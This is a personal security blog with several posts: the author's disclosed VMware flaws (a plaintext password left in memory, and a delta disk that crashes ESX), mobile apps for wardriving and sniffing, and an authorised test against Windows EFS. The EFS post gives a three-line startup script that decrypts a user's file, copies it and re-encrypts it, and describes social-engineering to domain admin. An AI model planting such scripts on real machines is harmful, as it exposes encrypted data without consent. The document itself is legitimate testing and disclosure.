VMWare VPX Client Patched

The issue with the VMWare VPX Client that I reported last summer was finally patched last week. The issue was that after using the VPX Client to authenticate with part of the VMWare infrastructure I observed that a plaintext version of the username and password remained resident in memory as long as the client was running. This is an issue because it could be possible for an attacker to use forensic techniques to recover your username and password. The issue was reported as CVE-2009-0518 and can also be found on the VMWare website. http://www.vmware.com/security/advisories/VMSA-2009-0005.html

Mobile Hacking

My old Palm smartphone finally died this Christmas and I got a new XV6800 smartphone. It comes WIFI enabled and I have found that it is really great for all kinds of wireless fun. I have found that there are plenty of great free Windows Mobile 6 applications for network scanning and analysis. I have fund that my phone works really well for searching for wireless access points. It has been really convienient to just turn the WIFI on my phone and see what was around. I have found tons of open and poorly secured access points at places that I go all the time. My phone has be also especially useful for finding rogue access points at work, becasue it is way easier to use my phone than to tote a laptop around the building. Using my phone for locating access points is so fun that it almost feels like a high tech easter egg hunt. Here is a list of a few apps that i have found for WM6 devices.
Wififofum2 for warwalking.
HandySniffer for packet sniffing.
MobileVT for ssh and other terminals.
vxutil for port scanning, ping sweep, tracert, and many other utils.
EDh for hex memory and file editing.

Vmware Delta Disk Issue Fixed

VMWare released an advisory yesterday for my delta disk issue.(Link) Thanks to VMWare for their hard work and cooperation in fixing the issue. Monty Ijzerman and his team were a pleasure to work with. The issue has a very low possibility of being exploited because the attacker would need rights to edit existing VM files or add a new VM. But, one viable attack vector would be through the distribution of a corrupt virtual appliance. An attacker could create a VM containing a corrupt delta disk and convince an administrator to load the VM for them. When the corrupt VM is powered on then it will cause the ESX host that it resides on to crash. VMware says that my other issues are expected to be patched in Q1 2009.

Windows EFS

So I have been playing around with windows EFS lately at work trying various ways to get access to EFS encrypted files and directories. At work we are implementing a new AD structure and looking into using EFS for encrypting sensitive files, from other employees in the office. So, my boss setup a test machine that used the new AD structue, placed an EFS encrypted file on there for me, and told me to do whatever it took to get the file. So upon researching EFS I found that there are 4 main ways to decrypt a file. Be the owner of a file, crack/steal the file owners password, become a domain or local recovery agent, or trick the user into decrypting it for you. I was actually prohibited from cracking or stealing any passwords so that was out of the question. I tryed to become a recovery agent and was able to use social eng. techniques to elevate my self to a domain admin and decrypt the files. But, I also wanted to use a purley technical approach so I also found a nice eliable way to gain access to the files. The machies were unlocked and had no bios password set, so I came in after hours, booted into backtrack and placed the following simple script in the startup directory of all users.

cipher /D /A filenameet
copy filename /mydir/filename
cipher /E /A filename

So if possible the best way to get around EFS if just to have the user decrypt it for you.